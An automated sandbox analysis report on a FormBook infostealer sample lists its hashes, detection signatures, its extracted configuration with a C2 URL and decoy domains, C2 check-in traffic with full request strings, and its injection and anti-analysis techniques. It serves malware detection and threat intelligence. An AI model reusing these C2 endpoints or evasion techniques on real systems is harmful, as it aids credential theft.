Analysis Report NdBLyH2h5d.exe

Overview

General Information

Sample Name: NdBLyH2h5d.exe
Analysis ID: 385309
MD5: 3fef6985af0d52ab6701df170096b504
SHA1: ac8db3220c960262f8e666eae676066cec541b3a
SHA256: a9c3d37d324e9b6a0ebf9f9369c68cc288117edc4657d086b0fbc0cbafee9e64
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

AV Detection:

Antivirus detection for URL or domain
Source: http://www.7chd.com/uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.montcoimmigrationlawyer.com/uoe8/"], "decoy": ["chalance.design", "certifiedlaywernj.com", "bsbgraphic.com", "caeka.com", "zagorafinancial.com", "cvingenieriacivil.net", "mojilifenoosa.com", "bucktheherd.net", "sparkmonic.com", "catherineandwilson.com", "cdefenders.com", "intersp.net", "santoriniimpressivetours.net", "arkansaspaymentrelief.com", "tewab.com", "bjzjgjg.com", "michgoliki.com", "oallahplease.com", "plaisterpress.com", "redyroblx.com", "funnyfootballmugs.com", "borderlesstrade.info", "partequity.net", "3992199.com", "bestcoloncleanseblog.com", "online-legalservices.com", "fibermover.com", "magen-tracks.xyz", "hotelsinshirdimkm.com", "beachjunction.com", "lanren.plus", "nouvellecartebancaire.com", "thegiftsofdepression.com", "metabol.parts", "dvxdkrbll.icu", "flsprayer.com", "przyczepy.net", "cantinhosdeaparecida.com", "californiasecuritycamera.com", "nevadasmallbusinessattorney.com", "skipperdaily.com", "missjeschickt.com", "rocketmortgageshady.net", "upholsteredwineracks.com", "best20singles.com", "fsquanyi.com", "ronlinebiz.com", "gaelmobilecarwash.com", "commercials.pro", "bl927.com", "workforceuae.com", "innercritictypes.com", "unipacksexpress.com", "chaitanya99.com", "rangamaty.com", "7chd.com", "keydefi.com", "liveporn.wiki", "carajedellcasting.com", "gooddoggymedia.com", "boldercoolware.com", "hispekdiamond.com", "expnashvilletn.com", "swashbug.com"]}
Multi AV Scanner detection for submitted file
Source: NdBLyH2h5d.exe Virustotal: Detection: 20%
Source: NdBLyH2h5d.exe ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.rundll32.exe.4d44f8.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.rundll32.exe.4b17960.5.unpack Avira: Label: TR/Patched.Ren.Gen

Compliance:

Uses 32bit PE files
Source: NdBLyH2h5d.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: NdBLyH2h5d.exe, 00000000.00000003.216210756.000000001EFE0000.00000004.00000001.sdmp, NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: NdBLyH2h5d.exe, rundll32.exe
Source: Binary string: rundll32.pdb source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA, 0_2_00405301
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, 0_2_00405C94
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_004026BC FindFirstFileA, 0_2_004026BC

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 4x nop then pop ebx 1_2_00406A9C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 4x nop then pop edi 1_2_0041563B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 4x nop then pop ebx 1_1_00406A9C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 4x nop then pop edi 1_1_0041563B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop ebx 6_2_02BA6A96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop edi 6_2_02BB563B

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.montcoimmigrationlawyer.com/uoe8/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.fibermover.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.mojilifenoosa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.7chd.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=UhlVi8jLiQUXpO3Mm3lJbnFIbsRb97T5i2flOgFV3YbeH0Xk3z/nbJUyPEwPPltkxnEn&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.hispekdiamond.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.swashbug.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.zagorafinancial.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.funnyfootballmugs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.przyczepy.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.3992199.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.montcoimmigrationlawyer.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.missjeschickt.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.142.156.44
Source: Joe Sandbox View IP Address: 23.227.38.74
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNSERVERSUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: unknown DNS traffic detected: queries for: www.fibermover.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 12 Apr 2021 08:06:24 GMT Content-Type: text/html Content-Length: 153 Connection: close Server: nginx/1.16.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: explorer.exe, 00000004.00000000.237810152.000000000F675000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: rundll32.exe, 00000006.00000002.483040430.0000000004C92000.00000004.00000001.sdmp String found in binary or memory: https://www.plaisterpress.com/uoe8/?Dnh8=ntdwrTRF9WA24Nqdf4NJYZb1FUQAWBN8mHVjFMye2D4j4jK3D0IQWYm/ipt

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404EA0

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_004181B0 NtCreateFile, 1_2_004181B0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00418260 NtReadFile, 1_2_00418260
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_004182E0 NtClose, 1_2_004182E0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00418390 NtAllocateVirtualMemory, 1_2_00418390
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041825A NtReadFile, 1_2_0041825A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_004182DA NtClose, 1_2_004182DA
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041838B NtAllocateVirtualMemory, 1_2_0041838B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_00A498F0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_00A49860
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49840 NtDelayExecution,LdrInitializeThunk, 1_2_00A49840
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A499A0 NtCreateSection,LdrInitializeThunk, 1_2_00A499A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_00A49910
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A20 NtResumeThread,LdrInitializeThunk, 1_2_00A49A20
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_00A49A00
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A50 NtCreateFile,LdrInitializeThunk, 1_2_00A49A50
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A495D0 NtClose,LdrInitializeThunk, 1_2_00A495D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49540 NtReadFile,LdrInitializeThunk, 1_2_00A49540
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_00A496E0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_00A49660
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_00A497A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49780 NtMapViewOfSection,LdrInitializeThunk, 1_2_00A49780
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49FE0 NtCreateMutant,LdrInitializeThunk, 1_2_00A49FE0
